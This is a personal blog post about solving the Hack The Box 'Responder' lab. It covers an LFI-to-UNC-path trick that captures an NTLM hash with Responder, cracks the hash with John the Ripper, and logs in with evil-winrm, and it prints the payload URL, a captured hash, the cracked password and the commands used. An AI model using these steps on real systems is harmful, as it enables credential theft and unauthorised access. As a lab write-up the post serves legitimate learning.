HTB “Responder” Lessons Learned – Not a standard walkthrough
George 
Hack The Box’s Responder – later on, I might take more of a full walkthrough approach of documenting the rooms in both HTB and THM for now though, I have decided just to post my thoughts and the lessons I learned in some of the rooms.
This is my take on HackTheBox.com room “Responder” in the Learn The Basics of Penetration Testing – Tier 1 – YOU NEED TO WALK BEFORE YOU CAN RUN – path. This room is listed as very easy and included the tags “SAMBA”, “Enumeration”, Apache” and “WinRM”. To work on this room I used an HP Elitebook X360 Gen3 I purchased off Craigslist. I am using 16GB Ram and Kali on bare metal. I also have Kali on VM using Virtual Box, in addition, I used a second PC, running Win11 to write notes and look up info.
This room took me over two days to complete. I found the room challenging and engaging, I had to use HTB’s WalkThrough, Google, and youtube, to get by some of the questions. In this room, we start to see “Local File Include Vulnerability (LFI)”, “Password Hashs” and more on PHP on apache. This room introduced me to the tools of the trade, like; “John The Ripper”, “Evil-WinRM”, and “Responder”.
Local – File Inclusion Vulnerability
This was a new thing for me to learn in this crash course. I hadn’t heard of this before, although after looking it up on Google I had seen in the wild before and never knew the name. I had spent a good amount of time teaching myself HTML and using WordPress, I never really used Apache and PHP much.
My basic takeaway was that using this exploit you can grab other information like host file info and a Hash using responder. I really need to look at this more in-depth in the coming days.
Using Responder
Just as Lfi and PHP were new to me, I found that the instructions around Responder were a bit dated, I spend a while following the provided walkthrough and youtube. Only to have no success at all. The HTB walkthrough had instructions for ubuntu and CLI with the Python3 commands, it started with the git commands – “git pull https://github.com/lgandx/Responder” I kept getting “fatal: Not a git repository (or any of the parent directories):.git” I spent a while trying to fix this, but I ended up giving up when I realized that Responder was included with Kali. Additionally, the walkthrough had suggested running “sudo python3 Responder.py -I tunX“. This wasn’t working for me at all as I was on Kali, after a bit of reading the man page for Responder, I figured out that I could use “sudo responder -tun0 python3″ to get the responder working.
Again the documentation said, in firefox go to the this — “http://unika.htb/?page=//10.10.14.25/somefile” at this point responder was not capturing the Hashes as the instructions had indicated. I spent a wile searching to see what the issue was. At some point, I figured that I needed to change IP listed in that like to the IP that the responder IP was listening for. Thus I changed the link to ” “http://unika.htb/?page=//10.10.X.X/somefile. to the IP I was on.
In the responder “Generic Option” this was listed as Responder IP, I plugged this in and captured the HASH in no time at all.
Hash Cracking with John The Ripper
Once I had the HASH, I encounter two different issues, that I wasn’t expecting. In the instructions I was to run the command “john -w=/usr/share/wordlists/rockyou.txt hash.txt“. Well, I had forgotten this was a new VM, I hadn’t unzipped the file rockyou.txt.gz. Ok rookie mistake, so I had to unzip it. Now how to do that on Linux? After a while of searching google, I found what I needed here – kali linux unzip rockyou.txt.gz Code Example (codegrepper.com) – I won’t make you click on the link, I will save you the time and effort.
No not gz or unzip worked.
Use – └─$ gunzip /usr/share/wordlists/rockyou.txt.gz that’s right step one of using John The Ripper or just “john” was to gunzip the rockyou.txt.gz to rockyou.txt!!! I hope this will save you time!
Next Problem – No password hashes loaded (see FAQ)
└─$ john -w=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
No password hashes loaded (see FAQ)
This drove me crazy, I had the docs and know the password was “badXXXXXXX” I start troubleshooting, ok “john” was up to date, the word file unzipped and the password was on the list. so it wasn’t that, Ok lets look at the hash file, I tried renaming, that wasn’t it.
I then moved the file to a directory on my machine so I could examine it better.
mkdir /usr/kali/hash
Copy and pasted the hash from Responder again
┌──(kali㉿kali)-[/]
└─$ echo “^[[200~Administrator::RESPONDER:62decc7e96a8d136:23DDB363FDB43763C20D225396017F7E:010100000000000080A52D72F556D801F3EFCDE82C5C87CC0000000002000800450045005500580001001E00570049004E002D00360034004D00440030004800410036004B0049004E0004003400570049004E002D00360034004D00440030004800410036004B0049004E002E0045004500550058002E004C004F00430041004C000300140045004500550058002E004C004F00430041004C000500140045004500550058002E004C004F00430041004C000700080080A52D72F556D80106000400020000000800300030000000000000000100000000200000979E95B2EB8D7F11AEAE2A51D88E52265BB5BC9DEB3DCCF7538748E8D210A5D50A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310035002E003200320031000000000000000000” > /usr/kali/hash/Responder_Hash_April232022.txt
Still the same error. “No password hashes loaded (see FAQ) “ Ok, what gives? You might see this mistake at this point, I hadn’t noticed.
I start looking at that hash now, I start googling I know that I have the right has from the box and I have the hash from the walkthrough, both are giving the same error! I start searching, maybe try “base64 -d hash.txt”, which does not work and gives me invalid input. I then try “hash-identifier” and met the same type of errors, at this point, I end up a GUI text editor and snagged the 1st google one of “emacs”.
Now in the GUI of emac GUI – I can see the issue right away? –
To quote Mr Spock, I had more than a few choices for “Colorful Metaphors” – but for now I will default to Blood Hell to again quote O’Brian and he must suffer. Ok, all kidding aside did you see the issue?
In the hash files I had copied and pasted from both Terminal and the documents added a string of text to my paste!!!
In my Kali set up whenever I paste anything into the terminal, I get the extra string of “[200~”. I haven’t found the answer to why it does this, and it bit me in the ass here. I removed the extra string from all of my hash files and they all work now!
WinRM
Now that I had the username and password I was able to easily use evil-winrm to get into the Target workstation!
┌──(kali㉿kali)-[~/hash]
└─$ evil-winrm -i 10.129.231.181 -u administrator -p badminton
Once in this target I noticed is Windows PowerShell, so back to windows command like we so. Move around with “cd ..” and dir until you find the flag.txt in a different users directory
BOOM. That’s that and this room was done.
As I said, you can find full walkthroughs everywhere. In time I will be at the suggestion of “NetworkChuck” writing walkthroughs for a non IT person so that I can get better at report writing. This is the next thing would like to work on.
Thank you to CyptoCat I used this youtube for help with this box! – (1) Tier 1: Responder – HackTheBox Starting Point – Full Walkthrough – YouTube
Well, I am off to the next challenge and to enjoy the Saturday. Let me know what you think and how I can get better for the reader. Bye for now, and to quote Hak5 “Trust Your Technolust!”
